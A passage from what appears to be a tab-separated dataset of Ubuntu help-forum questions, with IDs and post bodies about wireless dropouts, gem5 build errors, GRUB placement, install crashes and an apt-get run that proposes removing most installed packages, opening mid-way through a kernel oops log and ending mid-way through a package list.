89 9f a0 00 sep 26 12:45:22 epgg2 kernel : [ 184.064228 ] rip [ < ffffffffa029ba73 > ] nfs_file_set_open_context+0x23/0x80 [ nfs ] sep 26 12:45:22 epgg2 kernel : [ 184.080078 ] rsp < ffff882414253b88 > sep 26 12:45:22 epgg2 kernel : [ 184.088187 ] cr2 : 0000000000000030 sep 26 12:45:22 epgg2 kernel : [ 184.096113 ] -- - [ end trace 4a4d24758d2ccf4f ] -- - sep 26 12:45:22 epgg2 kernel : [ 184.095989 ] bug : unable to handle kernel paging request at 0000000f00010a0e sep 26 12:45:22 epgg2 kernel : [ 184.120329 ] ip : [ < ffffffff8103f989 > ] __ticket_spin_lock+0x9/0x30 sep 26 12:45:22 epgg2 kernel : [ 184.128303 ] pgd 2415580067 pud 0 sep 26 12:45:22 epgg2 kernel : [ 184.136792 ] oops : 0002 [ # 2 ] smp sep 26 12:45:22 epgg2 kernel : [ 184.144177 ] cpu 2 sep 26 12:45:22 epgg2 kernel : [ 184.144293 ] modules linked in : vesafb nfsd nfs lockd fscache auth_rpcgss nfs_acl sunrpc dcdbas gpio_ich coretemp kvm ghash_clmulni_intel aesni_intel cryptd aes_x86_64 microcode joydev lpc_ich i7core_edac edac_core mac_hid wmi acpi_power_meter lp parport hid_generic usbhid hid bnx2x libcrc32c mpt2sas mdio scsi_transport_sas bnx2 raid_class
350473	how do i copy and paste from local machine ?	i need to cut copy and or paste from a text file on my laptop into my vm.. since it does not ( the vm ) recognize my keyboard @ symbol .
350474	intel centrino wireless-n 1000 again ! ubuntu 13.04 x64	first i have to say that i tried everything written about this concept . the problem is that it stops working randomly in 3 main forms : 1 - sometimes it disconnect from wireless network and reconnect automatically 2 - sometimes it disconnect and wont connect no matter what ( needs reboot ) 3 - some times it 's still connected but can not ping or surf or whatever . i already tried disabling n mod using these commands : sudo modprobe -r iwlwifi modprobe iwlwifi 11n_disable=1 ( or 0 , whatever ) it did n't help . these are the results of lspci , sudo lshw -c network , ifconfig , iwconfig , rfkill list when it disconnected and did n't connect till reboot : ifconfig : eth0 link encap : ethernet hwaddr c8:0a : a9:34:65:77 up broadcast multicast mtu:1500 metric:1 rx packets:1563213476557380 errors:9379306629148050 dropped:3126435543049350 overruns:1563217771524675 frame:7816088857623375 tx packets:1563217771524675 errors:6252871086098700 dropped:0 overruns:1563217771524675 carrier:3126435543049350 collisions:7816088857623375 txqueuelen:1000 rx bytes:1563217771524675 ( 1.5 pb ) tx bytes:1563217771524675 ( 1.5 pb ) ham0 link encap : ethernet hwaddr 7a:79:19 : a5 : e4:93 inet addr:25.165.228.147 bcast:25.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :7879:19ff : fea5 : e493/64 scope : link inet6 addr : 2620:9b : :19a5 : e493/96 scope : global up broadcast running multicast mtu:1404 metric:1 rx packets:7743 errors:0 dropped:0 overruns:0 frame:0 tx packets:1250 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:665642 ( 665.6 kb ) tx bytes:204056 ( 204.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:41138 errors:0 dropped:0 overruns:0 frame:0 tx packets:41138 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6420962 ( 6.4 mb ) tx bytes:6420962 ( 6.4 mb ) wlan0 link encap : ethernet hwaddr 00:1e:64:45 : fb:70 inet6 addr : fe80 : :21e:64ff : fe45 : fb70/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:286999 errors:0 dropped:0 overruns:0 frame:0 tx packets:226966 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:324386887 ( 324.3 mb ) tx bytes:30674804 ( 30.6 mb ) iwconfig : ham0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off sudo lshw -c network : *-network description : wireless interface product : centrino wireless-n 1000 [ condor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:45 : fb:70 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-30-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:46 memory : c0400000-c0401fff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : c0 serial : c8:0a : a9:34:65:77 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:47 memory : c0900000-c093ffff ioport:5000 ( size=128 ) *-network description : ethernet interface physical id : 2 logical name : ham0 serial : 7a:79:19 : a5 : e4:93 size : 10mbit/s capabilities : ethernet physical configuration : autonegotiation=off broadcast=yes driver=tun driverversion=1.6 duplex=full ip=25.165.228.147 link=yes multicast=yes port=twisted pair speed=10mbit/s lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g98m [ geforce g 105m ] ( rev a1 ) 07:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 09:00.0 ethernet controller : qualcomm atheros ar8131 gigabit ethernet ( rev c0 ) rfkill list : 1 : acer-wireless : wireless lan soft blocked : no hard blocked : no 2 : acer-bluetooth : bluetooth soft blocked : yes hard blocked : no 9 : phy0 : wireless lan soft blocked : no hard blocked : no any help will be realllyyyy appreciated
350475	how can i install gem5 ?	i was helping my friend installing gem5 simulator on linux for her thesis work . i know linux a little bit . somehow i managed to install that simulator on my laptop with ubuntu 12.04 , but when i tried to install that simulator on her laptop it did n't go well . i gave the same commands on her laptop but it gave this error . $ scons build/alpha/gem5.opt scons : reading sconscript files ... error do n't know what compiler options to use for your compiler . compiler : none version : command not found ! if you 're trying to use a compiler other than gcc or clang , there appears to be something wrong with your environment . if you are trying to use a compiler other than those listed above you will need to ease fix sconstruct and src/sconscript to support that compiler . i tried same commands to install gem5 simulator by re installing ubuntu on her laptop . but same error . then i tried on linux mint 15 and fedora but got the same error . what am i doing wrong ? can somebody provide step by step guide to perform installation of gem5 simulator or can anybody can provide me a .deb file of it ? if not please at-least guide me how to create deb file of that sim , but please consider my skills are of beginner 's level .
350476	how to put my br dvd back on the task bar	i am totally new to this system and `` unlocked '' my dvd player from the task bar not knowing what it did . now i ca n't find how to use the dvd player or put it back on the task bar . i have a dvd in the player but it did not auto start .
350478	trouble installing ubuntu	i tried to install the latest version , i think it was 13.4 . now i 'm trying the previous version . it crashes every time . not really error messages as much as it will freeze or crash during installation . today it did something different , it crashed and went to a black screen with white letters . i tried to take a picture but it went away too quickly . is is possible it is not compatible with my hardware ?
350485	ethernet cable is not detected in ubuntu	i 'm using a lenovo thinkpad edge 530 . when i connect the ethernet cable while running ubuntu , it 's not being detected . the ethernet cable and network connection works fine when using windows 8 . can anyone tell me what is the problem and how it can be fixed ?
350488	use notify-osd instead notification-daemon in gnome-shell	how i can replace **notification-daemon** ( ugly notifications at bottom of screen ) by notifyosd ( modern bubbles in right upper corner ) ? i found some posts about this , but gnome at default mode do n't have default provider in gnome.session ( only in fall-back mode ) .
350489	cups spooling/server	i have updated my ubuntu system 12.04 after fresh installation . the update run well . after i shut down the pc i saw messages like : checking battery status [ ok ] and some more messages , what i do not understand is starting cups spooler/server [ ok ] or maybe stopping - i am not sure . i tried to google it and it seems that it has to do something with the printer ? i did not print anything or add printers or something like this and this really is a strange message . is it ok that i saw this message ?
350494	in what disk is grub located ?	i would like to know , since i 'm planning on recreating my partitions to fix some problems , but i would like to really make sure that grub deletes along with my partitions , if someone knows where the grub files are installed , cause if it is on the windows partition i would have to abort my plan . so long story short in what disk are grub files located ? my partitions : f : system reserved , ntfs file system , 350.00mb capacity and 203.18mb used space . ( i 'm not really sure but maybe this is the shadow storage disk since i set the maximum space used to around 350mb , but again , i 'm not sure ) c : ntfs > windows 8 partition * : ext4 > linux mint partition * : ntfs > 8.00gb swap partition * : ntfs > previous pear os partition , i formatted the disk , i 'm still not sure if i completelly deleted pear os , but it 's no longer accessible for sure d : ntfs > previous ubuntu partition , i uninstalled it temporarily .
350497	ubuntu 12.04 installation fatal error	i am trying install ubuntu 12.04 among with win7 . during hardware configuration i am receiving the following fatal error : `` executing 'grub-install/dev/sad ' failed . using the same installation disc in another pc the installation was completed without problems . what should i do ?
350500	trying to install a package but apt-get tries to remove all packets on the computer	i 'm trying to install ssh-import-id for openssh-server but i got this ... it totally blew my mind . i really need some help here ! thanks a lot in advance ! -s $ sudo apt-get install ssh-import-id reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : texlive-common libopencc1 folks-common libyaml-tiny-perl libpth20 fakeroot libbrlapi0.5 ttf-dejavu-extra libmeanwhile1 liblouis-data syslinux-legacy git-man empathy-common gcc-4.4-base java-common rpm-common syslinux-common libdotconf1.0 libexttextcat-data texlive-latex-recommended-doc icedtea-netx-common xbitmaps command-not-found-data texlive-latex-base-doc libsonic0 liblouis2 libgif4 libgtksourceview-3.0-common espeak-data tzdata-java apport-symptoms libminiupnpc8 remmina-common texlive-fonts-recommended-doc ibus-pinyin-db-android libspeechd2 libutempter0 ubuntu-wallpapers vim-runtime libyajl1 app-install-data libdb4.8 texlive-doc-base libevent-2.0-5 libmhash2 patch texlive-pstricks-doc librsync1 tex-common lacheck adium-theme-ubuntu activity-log-manager-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libenca0 libgl1-mesa-glx libglapi-mesa librcc0 librcd0 libtag1-rusxmms python3 python3-minimal python3.2 python3.2-minimal suggested packages : python3-doc python3-tk python3.2-doc binfmt-support recommended packages : openssh-server the following packages will be removed : accountsservice acl acpi-support acpid activity-log-manager-control-center aisleriot alsa-base alsa-utils anacron apg apparmor appmenu-gtk appmenu-gtk3 appmenu-qt apport apport-gtk apt apt-transport-https apt-utils apt-xapian-index aptdaemon apturl apturl-common aspell aspell-en at at-spi2-core avahi-autoipd avahi-daemon avahi-utils bamfdaemon baobab base-files bash bash-completion bc bind9-host binutils bluez bluez-alsa bluez-cups bluez-gstreamer brasero brasero-cdrkit brasero-common brltty bsdmainutils bzip2 ca-certificates-java checkbox checkbox-qt colord command-not-found compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default compizconfig-backend-gconf console-setup consolekit cpp cpp-4.4 cpp-4.6 crda cron cryptsetup-bin cups cups-bsd cups-client cups-filters cups-ppdc curl dbus dbus-x11 dconf-gsettings-backend dconf-service default-jre default-jre-headless deja-dup desktop-file-utils dictionaries-common dkms dmidecode dmsetup dnsmasq-base dnsutils doc-base dosfstools dropbox duplicity dvd+rw-tools ed eject empathy enchant eog espeak evince evince-common evolution-data-server file file-roller firefox firefox-gnome-support fontconfig foomatic-db-compressed-ppds foomatic-db-engine foomatic-filters friendly-recovery ftp fuse g++ g++-4.4 g++-4.6 gcalctool gcc gcc-4.4 gcc-4.6 gconf-service gconf-service-backend gconf2 gdb gedit gedit-common genisoimage geoclue geoclue-ubuntu-geoip gettext gettext-base ghostscript ghostscript-cups ghostscript-x ginn gir1.2-appindicator3-0.1 gir1.2-atk-1.0 gir1.2-atspi-2.0 gir1.2-dbusmenu-glib-0.4 gir1.2-dbusmenu-gtk-0.4 gir1.2-dee-1.0 gir1.2-gdkpixbuf-2.0 gir1.2-gmenu-3.0 gir1.2-gnomebluetooth-1.0 gir1.2-gnomekeyring-1.0 gir1.2-gtk-2.0 gir1.2-gtk-3.0 gir1.2-gtksource-3.0 gir1.2-gudev-1.0 gir1.2-indicate-0.7 gir1.2-launchpad-integration-3.0 gir1.2-notify-0.7 gir1.2-pango-1.0 gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-soup-2.4 gir1.2-totem-1.0 gir1.2-totem-plparser-1.0 gir1.2-ubuntuoneui-3.0 gir1.2-unity-5.0 gir1.2-vte-2.90 gir1.2-webkit-3.0 gir1.2-wnck-3.0 git gksu glib-networking glib-networking-services gnome-bluetooth gnome-control-center gnome-disk-utility gnome-font-viewer gnome-games-data gnome-icon-theme gnome-icon-theme-symbolic gnome-keyring gnome-media gnome-menus gnome-nettool gnome-online-accounts gnome-orca gnome-power-manager gnome-screensaver gnome-screenshot gnome-session gnome-session-bin gnome-session-canberra gnome-session-common gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-terminal gnome-terminal-data gnome-user-guide gnome-user-share gnomine gnupg google-chrome-stable gpgv groff-base growisofs grub-common grub-gfxpayload-lists grub-pc grub-pc-bin grub2-common gs-cjk-resource gsettings-desktop-schemas gstreamer0.10-alsa gstreamer0.10-gconf gstreamer0.10-nice gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gstreamer0.10-tools gstreamer0.10-x gtk2-engines gtk2-engines-murrine gtk3-engines-unico gucharmap guile-1.8-libs gvfs gvfs-backends gvfs-bin gvfs-common gvfs-daemons gvfs-fuse gvfs-libs gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hdparm hplip hplip-data humanity-icon-theme hunspell-en-ca hunspell-en-us hwdata hyphen-en-us ibus ibus-gtk ibus-gtk3 ibus-pinyin ibus-table icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-7-jre-jamvm icedtea-netx indicator-application indicator-appmenu indicator-datetime indicator-messages indicator-power indicator-printers indicator-session indicator-sound indicator-status-provider-mc5 info install-info intel-gpu-tools intltool-debian iptables iputils-ping iputils-tracepath irqbalance isc-dhcp-client isc-dhcp-common iw jockey-common jockey-gtk kbd kerneloops-daemon keyboard-configuration landscape-client-ui-install language-pack-en language-pack-en-base language-pack-gnome-en language-pack-gnome-en-base language-selector-common language-selector-gnome laptop-detect latex-beamer latex-xcolor launchpad-integration less libaa1 libaccountsservice0 libappindicator1 libappindicator3-1 libapr1 libaprutil1 libapt-inst1.4 libapt-pkg4.12 libarchive12 libasn1-8-heimdal libasound2 libasound2-plugins libasyncns0 libatasmart4 libatk-adaptor libatk-adaptor-schemas libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatkmm-1.6-1 libatspi2.0-0 libaudio2 libavahi-client3 libavahi-common3 libavahi-core7 libavahi-glib1 libavahi-gobject0 libavahi-ui-gtk3-0 libavc1394-0 libbamf0 libbamf3-0 libbind9-80 libbluetooth3 libbonobo2-0 libboost-graph-dev libboost-graph1.46-dev libboost-graph1.46.1 libboost-regex1.46.1 libboost-serialization1.46-dev libboost-serialization1.46.1 libboost-test1.46-dev libboost-test1.46.1 libboost1.46-dev libbrasero-media3-1 libbsd0 libc6-dev libcaca0 libcairo-gobject2 libcairo-perl libcairo2 libcairomm-1.0-1 libcamel-1.2-29 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libcap-ng0 libcap2 libcap2-bin libcdio-cdda1 libcdio-paranoia1 libcdio13 libcdparanoia0 libck-connector0 libcmis-0.2-0 libcolord1 libcompizconfig0 libcroco3 libcrypt-passwdmd5-perl libcryptsetup4 libcups2 libcupscgi1 libcupsdriver1 libcupsfilters1 libcupsimage2 libcupsmime1 libcupsppdc1 libcurl3 libcurl3-gnutls libcurl3-nss libdaemon0 libdbus-glib-1-2 libdbusmenu-glib4 libdbusmenu-gtk3-4 libdbusmenu-gtk4 libdbusmenu-qt2 libdconf-dbus-1-0 libdconf-qt0 libdconf0 libdecoration0 libdee-1.0-4 libdevmapper-event1.02.1 libdevmapper1.02.1 libdjvulibre21 libdmapsharing-3.0-2 libdns81 libdv4 libebackend-1.2-1 libebook-1.2-12 libecal-1.2-10 libedata-book-1.2-11 libedata-cal-1.2-13 libedataserver-1.2-15 libedataserverui-3.0-1 libedit2 libelf1 libenchant1c2a liberror-perl libespeak1 libevince3-3 libexempi3 libexif12 libexiv2-11 libexttextcat0 libfarstream-0.1-0 libfile-basedir-perl libfile-copy-recursive-perl libfile-desktopentry-perl libfile-mimeinfo-perl libflac8 libfolks-eds25 libfolks-telepathy25 libfolks25 libfontconfig1 libfontenc1 libframe6 libfreerdp-plugins-standard libfreerdp1 libfreetype6 libfribidi0 libfuse2 libgail-3-0 libgail-common libgail18 libgck-1-0 libgconf-2-4 libgconf2-4 libgcr-3-1 libgcrypt11 libgd2-xpm libgdata13 libgdbm3 libgdk-pixbuf2.0-0 libgdu-gtk0 libgdu0 libgee2 libgeis1 libgeoclue0 libgeoip1 libgettextpo0 libgexiv2-1 libgksu2-0 libgl1-mesa-dri-lts-quantal libgl1-mesa-glx-lts-quantal libglapi-mesa-lts-quantal libglew1.6 libglib-perl libglib2.0-bin libglibmm-2.4-1c2a libglu1-mesa libgmime-2.6-0 libgmp10 libgnome-bluetooth8 libgnome-control-center1 libgnome-desktop-3-2 libgnome-keyring0 libgnome-media-profiles-3.0-0 libgnome-menu-3-0 libgnome2-0 libgnome2-bin libgnome2-common libgnomekbd-common libgnomekbd7 libgnomevfs2-0 libgnomevfs2-common libgnutls26 libgoa-1.0-0 libgomp1 libgpg-error0 libgpgme11 libgphoto2-2 libgphoto2-port0 libgpm2 libgpod-common libgpod4 libgrail5 libgrip0 libgs9 libgssapi-krb5-2 libgssapi3-heimdal libgssdp-1.0-3 libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libgtk-3-0 libgtk-3-bin libgtk-3-common libgtk2-perl libgtk2.0-0 libgtk2.0-bin libgtkmm-3.0-1 libgtksourceview-3.0-0 libgtkspell-3-0 libgtop2-7 libgucharmap-2-90-7 libgudev-1.0-0 libgupnp-1.0-4 libgupnp-igd-1.0-4 libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libhcrypto4-heimdal libheimntlm0-heimdal libhpmud0 libhunspell-1.3-0 libhx509-5-heimdal libhyphen0 libibus-1.0-0 libical0 libice6 libicu48 libidl-common libidl0 libido3-0.1-0 libiec61883-0 libieee1284-3 libijs-0.35 libimobiledevice2 libindicate-gtk3 libindicate5 libindicator3-7 libindicator7 libisc83 libisccc80 libisccfg82 libisofs6 libjack-jackd2-0 libjasper1 libjavascriptcoregtk-3.0-0 libjson-glib-1.0-0 libjson0 libjte1 libk5crypto3 libkpathsea5 libkrb5-26-heimdal libkrb5-3 libkrb5support0 liblaunchpad-integration-3.0-1 liblcms1 liblcms2-2 libldap-2.4-2 liblightdm-gobject-1-0 liblockfile-bin liblockfile1 libltdl7 liblua5.1-0 liblvm2app2.2 liblwres80 libmagic1 libmail-sendmail-perl libmetacity-private0 libmission-control-plugins0 libmng1 libmpc2 libmpfr4 libmtp-runtime libmtp9 libmusicbrainz3-6 libmythes-1.2-0 libnautilus-extension1a libneon27-gnutls libnetfilter-conntrack3 libnettle4 libnewt0.52 libnfnetlink0 libnice10 libnl-3-200 libnl-genl-3-200 libnl-route-3-200 libnm-glib-vpn1 libnm-glib4 libnm-gtk0 libnm-util2 libnotify-bin libnotify4 libnspr4 libnss-mdns libnss3 libnss3-1d libnux-2.0-0 liboauth0 libogg0 libopenobex1 liborbit2 liborc-0.4-0 liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libp11-kit0 libpackagekit-glib2-14 libpam-cap libpam-ck-connector libpam-gnome-keyring libpango-perl libpango1.0-0 libpangomm-1.4-1 libpaper-utils libpaper1 libparted0debian1 libpcap0.8 libpci3 libpcsclite1 libpeas-1.0-0 libpipeline1 libpixman-1-0 libplist1 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpoppler-glib8 libpoppler19 libpopt0 libportaudio2 libprotobuf7 libprotoc7 libproxy1 libproxy1-plugin-gsettings libproxy1-plugin-networkmanager libpulse-mainloop-glib0 libpulse0 libpulsedsp libpurple-bin libpurple0 libpython2.7 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-xml libqt4-xmlpatterns libqtbamf1 libqtcore4 libqtdee2 libqtgconf1 libqtgui4 libquadmath0 libquvi7 libraptor2-0 librasqal3 libraw1394-11 libraw5 librdf0 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-gb libreoffice-help-en-us libreoffice-impress libreoffice-l10n-en-gb libreoffice-l10n-en-za libreoffice-math libreoffice-style-human libreoffice-style-tango libreoffice-writer librest-0.7-0 librhythmbox-core5 libroken18-heimdal librpm2 librpmbuild2 librpmio2 librpmsign0 librsvg2-2 librsvg2-common librtmp0 libsamplerate0 libsane libsane-hpaio libsasl2-2 libsasl2-modules libsdl1.2debian libsgutils2-2 libshout3 libsigc++-2.0-0c2a libslp1 libsm6 libsmbclient libsndfile1 libsnmp15 libsoup-gnome2.4-1 libsoup2.4-1 libspectre1 libspeex1 libspeexdsp1 libssh-4 libstartup-notification0 libstdc++6-4.4-dev libstdc++6-4.6-dev libsvn1 libswitch-perl libsyncdaemon-1.0-1 libsys-hostname-long-perl libt1-5 libtag1-vanilla libtag1c2a libtalloc2 libtasn1-3 libtdb1 libtelepathy-farstream2 libtelepathy-glib0 libtelepathy-logger2 libthai0 libtheora0 libtiff4 libtimezonemap1 libtotem-plparser17 libtotem0 libubuntuoneui-3.0-1 libunique-3.0-0 libunistring0 libunity-2d-private0 libunity-core-5.0-5 libunity-misc4 libunity9 libupower-glib1 libusb-0.1-4 libusb-1.0-0 libusbmuxd1 libuuid-perl libv4l-0 libvisual-0.4-0 libvisual-0.4-plugins libvncserver0 libvorbis0a libvorbisenc2 libvorbisfile3 libvte-2.90-9 libwacom2 libwavpack1 libwbclient0 libwebkitgtk-3.0-0 libwind0-heimdal libwmf0.2-7 libwmf0.2-7-gtk libwnck-3-0 libwnck22 libwpd-0.9-9 libwpg-0.2-2 libwps-0.2-2 libwrap0 libxapian22 libxatracker1-lts-quantal libxaw7 libxcb-dri2-0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-util0 libxcomposite1 libxcursor1 libxfont1 libxft2 libxi6 libxinerama1 libxkbfile1 libxklavier16 libxmu6 libxmuu1 libxp6 libxpm4 libxrandr-ltsq2 libxrandr2 libxrender1 libxres1 libxslt1.1 libxss1 libxt6 libxtst6 libxv1 libxvmc1 libxxf86dga1 libyelp0 libzeitgeist-1.0-1 libzephyr4 light-themes lightdm linux-generic-lts-quantal linux-image-3.5.0-23-generic linux-image-3.5.0-40-generic linux-image-generic-lts-quantal linux-sound-base lmodern locales lockfile-progs logrotate lsb-release lshw lsof ltrace luatex mahjongg make man-db mawk media-player-info metacity metacity-common mlocate modemmanager mousetweaks mtools mtr-tiny myspell-en-au myspell-en-gb myspell-en-za mythes-en-au mythes-en-us nano nautilus nautilus-data nautilus-sendto nautilus-sendto-empathy nautilus-share net-tools netbase netcat-openbsd network-manager network-manager-gnome network-manager-pptp network-manager-pptp-gnome notify-osd ntfs-3g ntpdate nux-tools nvidia-common obex-data-server obexd-client onboard oneconf openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib openoffice.org-hyphenation openprinting-ppds openssh-client overlay-scrollbar parted pciutils perl perl-modules pgf pkg-config plymouth-label plymouth-theme-ubuntu-logo plymouth-theme-ubuntu-text pm-utils po-debconf policykit-1 policykit-1-gnome poppler-utils powermgmt-base ppp pppconfig pppoeconf pptp-linux printer-driver-c2esp printer-driver-foo2zjs printer-driver-gutenprint printer-driver-hpcups printer-driver-hpijs printer-driver-min12xxw printer-driver-pnm2ppa printer-driver-postscript-hp printer-driver-ptouch printer-driver-pxljr printer-driver-sag-gdi printer-driver-splix prosper protobuf-compiler ps2eps psmisc pulseaudio pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python python-appindicator python-apport python-apt python-apt-common python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-brlapi python-cairo python-chardet python-configglue python-crypto python-cups python-cupshelpers python-dateutil python-dbus python-debian python-debtagshw python-defer python-dirspec python-egenix-mxdatetime python-egenix-mxtools python-gconf python-gdbm python-gi python-gi-cairo python-gnomekeyring python-gnupginterface python-gobject python-gobject-2 python-gst0.10 python-gtk2 python-httplib2 python-ibus python-imaging python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-libproxy python-libxml2 python-louis python-mako python-markupsafe python-notify python-oauth python-openssl python-packagekit python-pam python-pexpect python-piston-mini-client python-pkg-resources python-problem-report python-protobuf python-pyatspi2 python-pycurl python-pyinotify python-renderpm python-reportlab python-reportlab-accel python-serial python-simplejson python-smbc python-software-properties python-speechd python-twisted-bin python-twisted-core python-twisted-names python-twisted-web python-ubuntu-sso-client python-ubuntuone-client python-ubuntuone-control-panel python-ubuntuone-storageprotocol python-uno python-virtkey python-wadllib python-xapian python-xdg python-xkit python-zeitgeist python-zope.interface python2.7 qdbus qt-at-spi radeontool remmina remmina-plugin-rdp remmina-plugin-vnc resolvconf rfkill rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins rhythmbox-ubuntuone rpm rpm2cpio rsync rsyslog rtkit samba-common-bin sane-utils seahorse sessioninstaller shared-mime-info shotwell simple-scan smbclient sni-qt software-center software-center-aptdaemon-plugins software-properties-common software-properties-gtk speech-dispatcher ssh-askpass-gnome strace subversion sudo syslinux system-config-printer-common system-config-printer-gnome system-config-printer-udev tcpd tcpdump telepathy-gabble telepathy-haze telepathy-idle telepathy-indicator telepathy-logger telepathy-mission-control-5 telepathy-salut telnet texlive texlive-base texlive-binaries texlive-extra-utils texlive-font-utils texlive-fonts-recommended texlive-generic-recommended texlive-latex-base texlive-latex-recommended texlive-luatex texlive-pstricks thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-gb thunderbird-locale-en-us time tipa toshset totem totem-common totem-mozilla totem-plugins transmission-gtk ubuntu-artwork ubuntu-desktop ubuntu-docs ubuntu-extras-keyring ubuntu-minimal ubuntu-mono ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-standard ubuntu-system-service ubuntuone-client ubuntuone-client-gnome ubuntuone-control-panel ubuntuone-couch ubuntuone-installer udisks ufw unattended-upgrades unity unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread unity-asset-pool unity-common unity-greeter unity-lens-applications unity-lens-files unity-lens-music unity-lens-video unity-scope-musicstores unity-scope-video-remote unity-services uno-libs3 unzip update-inetd update-manager update-manager-core update-notifier update-notifier-common upower ure ureadahead usb-creator-common usb-creator-gtk usb-modeswitch usb-modeswitch-data usbmuxd usbutils uuid-runtime vbetool vim vim-common vim-tiny vino virtualbox-4.2 wbritish whiptail whois whoopsie wodim wpasupplicant x11-apps x11-session-utils x11-utils x11-xfs-utils x11-xkb-utils x11-xserver-utils x11-xserver-utils-lts-quantal xauth xdg-user-dirs xdg-user-dirs-gtk xdiagnose xfonts-base xfonts-mathml xfonts-scalable xfonts-utils xinit xinput xorg xserver-common xserver-common-lts-quantal xserver-xorg-core-lts-quantal xserver-xorg-input-all-lts-quantal xserver-xorg-input-evdev-lts-quantal xserver-xorg-input-mouse-lts-quantal xserver-xorg-input-synaptics-lts-quantal xserver-xorg-input-vmmouse-lts-quantal xserver-xorg-input-wacom-lts-quantal xserver-xorg-lts-quantal xserver-xorg-video-all-lts-quantal xserver-xorg-video-ati-lts-quantal xserver-xorg-video-cirrus-lts-quantal xserver-xorg-video-fbdev-lts-quantal xserver-xorg-video-intel-lts-quantal 